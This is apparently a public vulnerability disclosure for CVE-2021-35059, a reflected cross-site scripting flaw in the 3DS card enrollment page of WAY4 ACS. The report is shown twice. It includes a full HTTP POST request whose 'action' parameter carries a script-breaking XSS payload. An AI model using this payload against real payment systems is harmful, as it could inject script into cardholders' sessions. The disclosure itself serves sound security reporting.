exviry/CVE-2021-35059 Secret

## CVE-2021-35059
CVE-2021-35059
------------------------------------------

A reflected cross-site scripting (XSS) vulnerability in WAY4 ACS before 1.2.278-2693 allows remote attackers to inject arbitrary JavaScript or HTML code via the 'action' parameter in a 3DS card enrollment page.

------------------------------------------

[Additional Information]
During penetration testing of our clients' infrastructure, we discovered vulnerabilities in a third-party software - WAY4 ACS.

Application writes data of the 'action' POST-parameter to a page /way4acs/enroll without any sanitization which may lead to JavaScript or HTML-code execution.
Request example which trigger XSS:

POST /way4acs/enroll HTTP/1.1
Host: application
Connection: close
Content-Length: 79
Content-Type: application/x-www-form-urlencoded

action=canary"==="canary"))%0aa='';%0a}%0aalert("XSS");%0aif+(el){%0aif(("check

------------------------------------------

[VulnerabilityType Other]
Cross-site scripting (XSS)

------------------------------------------

[Vendor of Product]
OpenWay Group

------------------------------------------

[Affected Product Code Base]
WAY4 ACS before V.1.2.278-2693

------------------------------------------

[Has vendor confirmed or acknowledged the vulnerability?]
True

------------------------------------------

[Affected Component]
/way4acs/enroll

-----------------------------------------

[Attack Type]
Remote

------------------------------------------

[Discoverer]
Aleksey Shupletsov
Deiteriy Co. Ltd. (https://deiteriylab.com/)

------------------------------------------

[Reference]
OpenWay Group (https://www.openwaygroup.com/way4-platform)

Aleksey Shupletsov / Deiteriy Co. Ltd. (https://deiteriylab.com/)
	CVE-2021-35059
	------------------------------------------

	A reflected cross-site scripting (XSS) vulnerability in WAY4 ACS before 1.2.278-2693 allows remote attackers to inject arbitrary JavaScript or HTML code via the 'action' parameter in a 3DS card enrollment page.

	------------------------------------------

	[Additional Information]
	During penetration testing of our clients' infrastructure, we discovered vulnerabilities in a third-party software - WAY4 ACS.

	Application writes data of the 'action' POST-parameter to a page /way4acs/enroll without any sanitization which may lead to JavaScript or HTML-code execution.
	Request example which trigger XSS:

	POST /way4acs/enroll HTTP/1.1
	Host: application
	Connection: close
	Content-Length: 79
	Content-Type: application/x-www-form-urlencoded

	action=canary"==="canary"))%0aa='';%0a}%0aalert("XSS");%0aif+(el){%0aif(("check

	------------------------------------------

	[VulnerabilityType Other]
	Cross-site scripting (XSS)

	------------------------------------------

	[Vendor of Product]
	OpenWay Group

	------------------------------------------

	[Affected Product Code Base]
	WAY4 ACS before V.1.2.278-2693

	------------------------------------------

	[Has vendor confirmed or acknowledged the vulnerability?]
	True

	------------------------------------------

	[Affected Component]
	/way4acs/enroll

	-----------------------------------------

	[Attack Type]
	Remote

	------------------------------------------

	[Discoverer]
	Aleksey Shupletsov
	Deiteriy Co. Ltd. (https://deiteriylab.com/)

	------------------------------------------

	[Reference]
	OpenWay Group (https://www.openwaygroup.com/way4-platform)

	Aleksey Shupletsov / Deiteriy Co. Ltd. (https://deiteriylab.com/)